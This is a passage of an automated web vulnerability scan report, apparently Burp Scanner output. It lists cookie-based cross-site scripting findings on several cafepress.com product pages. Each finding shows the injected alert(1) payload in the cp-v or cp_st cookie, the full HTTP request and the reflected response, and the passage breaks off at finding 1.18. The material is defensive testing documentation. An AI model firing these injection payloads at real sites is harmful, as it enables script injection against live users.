__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 59198 Date: Sun, 26 Dec 2010 13:47:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59198 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.13. http://www.cafepress.com/+baby-bodysuits [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-bodysuits
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d208f</script><script>alert(1)</script>60e92653a56 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-bodysuits HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d208f</script><script>alert(1)</script>60e92653a56 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59220 Date: Sun, 26 Dec 2010 13:47:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/ Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59220 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'd208f</script><script>alert(1)</script>60e92653a56 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.14. http://www.cafepress.com/+baby-hat [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-hat
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50827"-alert(1)-"00860494a78 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-hat HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 58548 Date: Sun, 26 Dec 2010 13:47:22 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/ Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58548 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.15. http://www.cafepress.com/+baby-hat [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-hat
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93433</script><script>alert(1)</script>a643f06e2bf was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-hat HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93433</script><script>alert(1)</script>a643f06e2bf ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 58578 Date: Sun, 26 Dec 2010 13:47:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/ Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58578 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '93433</script><script>alert(1)</script>a643f06e2bf ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_0...[SNIP]...
1.16. http://www.cafepress.com/+bags [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bags
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab65"-alert(1)-"48e2c7462b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bags HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 59555 Date: Sun, 26 Dec 2010 13:47:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/ Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59555 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.17. http://www.cafepress.com/+bags [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bags
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91e0a</script><script>alert(1)</script>2ef0362a154 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bags HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=91e0a</script><script>alert(1)</script>2ef0362a154 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59583 Date: Sun, 26 Dec 2010 13:47:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59583 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '91e0a</script><script>alert(1)</script>2ef0362a154 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.18. http://www.cafepress.com/+boxers [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+boxers
Issue detail
